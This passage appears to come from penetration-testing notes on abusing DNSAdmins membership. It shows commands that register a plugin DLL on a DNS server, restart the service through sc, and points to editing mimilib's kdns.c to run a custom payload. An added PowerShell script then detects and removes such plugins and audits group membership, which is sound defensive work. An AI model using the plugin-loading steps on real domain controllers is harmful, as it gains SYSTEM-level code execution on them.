Set-DnsServerSetting -InputObject $dnsettings -ComputerName evil-dc -Verbose

Restart dns service

sc \\evil-dc stop dns
sc \\evil-dc start dns

  • By default the mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log

  • Edit kdns.c to execute custom payload
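Both the dnscmd and the Set-DnsServerSetting lines above end up as the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters on the DNS server, which is the thing to watch. The PowerShell below, an added example that is not part of these notes or of mimilib, reads that value on every DNS server, classifies it, lists DNSAdmins membership, and clears a rogue plugin. It assumes the RSAT ActiveDirectory module and WinRM to the servers; the function names are constructed.

```powershell
# Added example, not from the original notes or from mimilib.
Import-Module ActiveDirectory

function Get-DnsPluginDllStatus {
    param([string[]]$DnsServer = @((Get-ADDomainController -Filter *).HostName))
    foreach ($s in $DnsServer) {
        $dll = Invoke-Command -ComputerName $s -ScriptBlock {
            (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
                -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
        }
        [pscustomobject]@{
            Server    = $s
            PluginDll = $dll
            # Any value is unusual; a UNC path means dns.exe (SYSTEM) loads code off the network.
            Finding   = $(if ([string]::IsNullOrEmpty($dll)) { 'none' }
                          elseif ($dll -like '\\*') { 'remote DLL' }
                          else { 'local DLL' })
        }
    }
}

function Get-DnsAdminsMembers {
    # Membership here is equivalent to SYSTEM on every DNS server, so keep it empty.
    Get-ADGroupMember -Identity DNSAdmins -Recursive | Select-Object SamAccountName, objectClass
}

function Clear-DnsPluginDll {
    param([Parameter(Mandatory)][string]$Server)
    Invoke-Command -ComputerName $Server -ScriptBlock {
        Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
            -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
        Restart-Service -Name DNS   # the plugin is only loaded or unloaded when dns.exe restarts
    }
}

Get-DnsPluginDllStatus | Format-Table -AutoSize
Get-DnsAdminsMembers
```

Because the DLL is loaded only on service restart, a DNS service stop/start on a DC outside a maintenance window (the sc commands above) is the second signal to alert on, alongside any write to the registry value.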
